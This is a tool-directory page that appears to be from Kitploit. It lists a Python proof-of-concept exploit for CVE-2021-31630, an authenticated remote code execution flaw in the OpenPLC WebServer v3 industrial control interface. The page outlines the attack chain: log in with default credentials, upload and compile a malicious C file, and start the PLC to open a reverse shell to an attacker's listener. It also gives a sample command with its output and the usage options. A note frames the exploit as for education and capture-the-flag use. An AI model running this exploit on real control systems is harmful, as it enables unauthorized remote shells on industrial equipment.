Skip to content
KitploitKITPLOIT
ToolsExploitsBlog
Log in
Submit
ToolsExploitsBlog
Submit

Hacking, PenTest, and Cybersecurity Tools for Your Security Arsenal!

Kitploit is a directory of hacking, cybersecurity, and pentesting tools. Discover the latest project updates to find vulnerabilities, analyze systems, automate testing, and strengthen your security.

··Feeds·Contact·Privacy·© 2026 Kitploit

Tool Directory

Categories

View all categories
Loading categories
CVE-2021-31630 — POC Exploit for CVE-2021-31630 written in Python3 and using C reverse shell with non-blocking mode | Kitploit
Tools/GitHubGitHub/flojboj/cve-2021-31630
ExploitationSCADA/ICS SecurityWeb Application ExploitationCTFLearning & EducationPayload Development
GitHubflojboj/cve-2021-31630

CVE-2021-31630

POC Exploit for CVE-2021-31630 written in Python3 and using C reverse shell with non-blocking mode

View Repository
162 years agoNot yet reviewed

Most Popular

View all →

Discover the most used tools by our community.

Explore all tools

Browse our collection of tools

View all tools →
Share

OpenPLC WebServer v3 - Authenticated RCE (CVE-2021-31630)


This exploit is based on the exploit from Exploit-DB made by Fellipe Oliveira.

  • First, authenticate
  • Upload a malicious C file
  • Compile it
  • Start the PLC (initiate reverse shell)
  • Stop the PLC (no need to run it, the reverse shell is already initiated)
└─# python3 custom_exploit.py --url http://10.10.11.7:8080 --username openplc --password openplc --listenerip 10.10.16.4 --listenerport 8888
[*] Authenticated.
[*] C file uploaded. Waiting for compilation.
[*] Compiled, probably.
[*] Started PLC, you should get your reverse shell now.
[*] Stopped PLC.

How to use

python3 exploit.py --url <> --username <> --password <> --listenerip <> --listenerport <>

Options:

  • --url - URL of the OpenPLC
  • --username - username
  • --password - password
  • --listenerip - IP address of the listener
  • --listenerport - port of the listener

NOTE: This exploit is created as a PoC; use it only for educational purposes or CTFs - https://flojboj.org/article/WifineticTwo

Download Tool